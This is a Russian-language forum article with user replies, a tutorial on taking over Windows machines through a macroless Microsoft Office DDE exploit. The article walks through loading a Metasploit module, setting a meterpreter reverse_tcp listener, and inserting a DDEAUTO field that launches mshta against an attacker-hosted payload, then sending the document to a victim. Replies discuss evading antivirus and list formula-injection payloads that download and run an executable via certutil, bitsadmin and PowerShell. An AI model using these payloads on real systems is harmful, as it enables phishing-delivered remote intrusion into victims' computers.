• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS)

DDE-Exploit.jpg




DDE экплойт также известен как динамический обмен данными, позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем. Хакеры использовали этот метод для запуска вредоносных скриптов с целью взлома системы.

Об этом в Microsoft сообщали такие службы, как Sensepost, Etienne Stalmans, и Saif El-Sherei, но он не был исправлен, поскольку многие приложения используют протокол DDE. Этот эксплойт не требует включения макрофункции.

Необходимые условия – DDE exploit
  • Машина использующая операционную систему Windows
  • Microsoft Office (любая версия)
  • KALI LINUX
Мы вынуждены будем импортировать Metasploit эксплойт.
Загрузите его из GitHub с помощью командного терминала.


Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Отправьте скрипт в местоположение Metasploit
Код:
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Screen-Shot-2017-11-09-at-5.50.40-PM.png



Теперь наберите msfconsole на терминале, который запускает Metasploit framework, а затем наберите reload_all, чтобы загрузить модули.


Screen-Shot-2017-11-09-at-5.56.08-PM.png


Этот эксплойт использует функцию dde, чтобы поставить hta payload. А теперь наберите

Код:
use exploit/windows/dde_delivery

затем установите хост сервера, используя следующую команду:

Код:
set SRVHOST 192.168.177.141

мы должны установить прослушиватель payload. Не используйте порт 8080, поскольку порт сервера установлен по умолчанию на 8080.
  1. установите PAYLOAD windows/meterpreter/reverse_tcp
  2. установите LHOST 192.168.177.141
  3. установите LPORT 6708
  4. эксплойт
Screen-Shot-2017-11-09-at-6.29.07-PM.png



Теперь вставьте код в любой документ word. Мы использовали полностью обновленный office 365 pro plus. Разместите формулу, и у вас должно быть небольшое поле ошибки в документе, а затем щелкните правой кнопкой мыши по коду. Вставьте команду в документ между цветными скобками. Сохраните документ.

Код:
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

После отправки документа получателю у вас откроется сессия измерителя.

Отказ от ответственности

Эта статья предназначена только для образовательных целей. Любые действия и/или деятельность, связанные с материалом, содержащимся на этом веб-сайте, будут рассматриваться исключительно в зоне действия вашей ответственности. Нелегальное использование информации на этом веб-сайте может привести к уголовным обвинениям, выдвинутым против соответствующих лиц. Авторы и не будут нести ответственность в случае возбуждения уголовного обвинения против любых лиц, злоупотребляющих информацией на этом веб-сайте, с целью нарушения закона.


Источник:
 

QZ131

One Level
11.03.2018
4
4
BIT
0
народ, макросы это совсем другой вид уязвимости..По dde если система с обновлениями, то ничего не получится. плюс антивирусы палят безбожно.
Тема рабочая, но с нюансами. На данный момент, многие темы палятся антивирусами, но применяя их в многоступенчатых подходах. Все заходит.

А не подскажете что за параметр SRVHOST?
Адрес управляющего сервера.
 

☠xrahitel☠

Grey Team
09.12.2016
240
305
BIT
43
можно код получить,тот который вводили в яндексе?
Код:
cmd /c certutil -urlcache -split -f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %APPDATA%\putty.exe & start %APPDATA%\putty.exe
=cmd|' /c bitsadmin /transfer d90f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %APPDATA%\putty.exe&%APPDATA%\putty.exe&del %APPDATA%\putty.exe'!A0
=cmd|' /C powershell Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe -OutFile "$env:Temp\putty.exe"; Start-Process "$env:Temp\putty.exe"'!A1
-2+3+cmd|'/C explorer https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'!A1&cmd|' /C %USERPROFILE%\Downloads\putty.exe'!A1
=cmd|'/c powershell -command "& { iwr https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe -OutFile putty.exe }";cmd /c putty.exe'!A1
 
  • Нравится
Реакции: erlan1749
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!